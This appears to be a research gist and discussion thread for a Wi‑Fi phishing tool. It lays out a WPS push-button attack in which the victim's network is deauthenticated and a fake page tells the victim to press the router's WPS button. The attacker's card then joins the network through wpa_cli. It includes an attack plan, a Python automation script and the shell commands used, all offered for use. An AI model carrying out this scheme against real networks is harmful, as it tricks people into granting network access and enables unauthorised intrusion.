WPS push button research for Wifiphisher

scheme.md

Scheme for wps button attack

Using 2 wireless cards

-1 Setup everything as usual
-2 The victim sees the template that has a "continue" button
    that button has a post request that starts all the process.
    we use this because we can't start the process in other ways
    with only 2 wireless cards
-3 In a thread we have a listener waiting for that post request that
    starts everything

The process

-4 The message to push the button appears to the victim screen while
    we stop the deauth setting up the wpa_cli on the same wireless card
-5 We wait 2 mins ( the wps_bpc is activated for 2 mins from when the
    button is pressed on all routers) trying to connect to the AP while we
    keep scanning to see if the AP channel is still the same. 
-6 If we are not connected the interface goes back to deauthenticate the
    target, otherwise we are done

Problems

What if the victim resets the router instead of pressing the wps button?

- It doesn't really matter because after those two minutes the interface
    goes back to deauth, but before that it does a scan searching for our
    target (using BSSID) updating the deauth with the new channel
    (after the victim restarts the router the channel changes)
    to make sure that the deauth restarts properly.
-Then it restarts everything again, wait the user to press continue, stop the deauth,
    check if it's connected for 2mins, and so on.

Why do we need the "continue" button?

- Since we only have 2 wireless interfaces we need to know when to switch to deauth
    and when to start listening for wps connection.
    ( everything will be more clear when the html will be done )

wps_pbc.py

import os, subprocess

"""
    Automatic WPS connection with push button
    Passing argument : bssid and iface
"""
class WPS(object):
    def __init__(self, bssid, iface):
        self.bssid = bssid
        self.iface = iface
        self.conf_dir = "/etc/wpa_supplicant.conf"

    def setup(self):

        """Setup"""

        sup = "sudo echo -e \"ctrl_interface=/var/run/wpa_supplicant\\"\
                "nctrl_interface_group=0\\nupdate_config=1\" > "+self.conf_dir #wpa_supplicant confs

        wpa_set = "sudo wpa_supplicant -B -Dwext -i"+self.iface+" -c"+self.conf_dir #Start wpa_supplicant
        iface_up = "sudo ifconfig "+self.iface+" up" #sometimes the iface goes down after wpa_supplicant
        wpa_cli = "sudo wpa_cli -i "+self.iface+" wps_pbc "+self.bssid+" -B" #start listening for wps_pbc

        """Launching the commands"""

        subprocess.call([sup], shell=True)
        subprocess.call([wpa_set], shell=True)
        subprocess.call([iface_up], shell=True)

        cli = subprocess.Popen(wpa_cli, shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)

    def dest(self):

        """Disconnecting from the AP"""

        rm = "sudo rm "+self.conf_dir
        iface_dw = "sudo ifconfig "+self.iface+" down"
        iface_up = "sudo ifconfig "+self.iface+" up"
        wpa = "killall wpa_supplicant"

        subprocess.call([rm], shell=True)
        subprocess.call([iface_dw], shell=True)
        subprocess.call([iface_up], shell=True)
        subprocess.call([wpa], shell=True)

wp = WPS("28:c6:8e:7d:51:d3", "wlan1")
wp.dest()

wps_push_button.md

How the push button actually works :

Push-button configuration (PBC): in some Wi-Fi Protected Setup networks, the user may connect multiple devices to the network and enable data encryption by pushing a button. The access point/wireless router will have a physical button, and other devices may have a physical or software-based button. Users should be aware that during the two-minute setup period which follows the push of the button, unintended devices could join the network if they are in range.

source

Single commands :

sudo echo -e "ctrl_interface=/var/run/wpa_supplicant\nctrl_interface_group=0\nupdate_config=1" > /etc/wpa_supplicant.conf
sudo wpa_supplicant -B -Dwext -iwlan1 -c/etc/wpa_supplicant.conf
sudo ifconfig wlan1 up   #not necessary (sometimes the iface goes down when activating wpa_supplicant)
sudo wpa_cli -i wlan1 wps_pbc 28:c6:8e:7d:51:d3 -B    #your AP's bssid

Automated version :

Here it's the script that automate the connection through wps_pbc : script

@JetseVerschuren it means the out put will change on your AP ( it's different in every AP but the commands are the same )
Anyway i tested all the commands and you can find a video with all the commands here :
Video

@laozi999 the way i wrote it

The target is selected and the new AP + deauth start

was just to speed up, it meant it's a normal configuration with one interface for the AP and one for the deauth, also we don't need to keep scanning the channel we can just scan it if the connection is failed because otherwise we don't need it.
We need to now the new channel only if the router is resetted because if the victim press the wps the attack is done and we don't need to deauth anymore

@laozi999 anyway i'm basically done automating the process that allows the wps connection ( automates the commands i wrote in wps_push_button.md )

@JetseVerschuren if you're intrested check this : https://gist.github.com/Splinter0/eceed2a7d8d0e4d3cfac9fc2d888093c#file-wps_pbc-py